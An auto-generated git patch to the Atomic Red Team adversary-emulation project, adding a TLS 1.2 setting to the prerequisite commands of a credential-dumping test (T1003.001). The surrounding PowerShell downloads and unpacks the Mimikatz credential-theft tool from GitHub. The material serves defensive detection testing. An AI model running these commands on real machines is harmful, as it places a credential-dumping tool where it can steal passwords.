From 705e7aaadfde543cc4d9f9318a958ed047faa2fd Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Fri, 17 Jul 2020 19:53:05 +0000 Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=master --- atomics/Indexes/index.yaml | 1 + atomics/T1003.001/T1003.001.md | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index d2b4d742..de4f0749 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -17994,6 +17994,7 @@ credential-access: - description: Mimikatz must exist on disk at specified location (#{mimikatz_exe}) prereq_command: 'if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}' get_prereq_command: |- + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200308/mimikatz_trunk.zip" -OutFile "$env:TEMP\Mimi.zip" Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force New-Item -ItemType Directory (Split-Path #{mimikatz_exe}) -Force | Out-Null diff --git a/atomics/T1003.001/T1003.001.md b/atomics/T1003.001/T1003.001.md index e7912afd..8b1a26b9 100644 --- a/atomics/T1003.001/T1003.001.md +++ b/atomics/T1003.001/T1003.001.md @@ -302,6 +302,7 @@ if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200308/mimikatz_trunk.zip" -OutFile "$env:TEMP\Mimi.zip" Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force New-Item -ItemType Directory (Split-Path #{mimikatz_exe}) -Force | Out-Null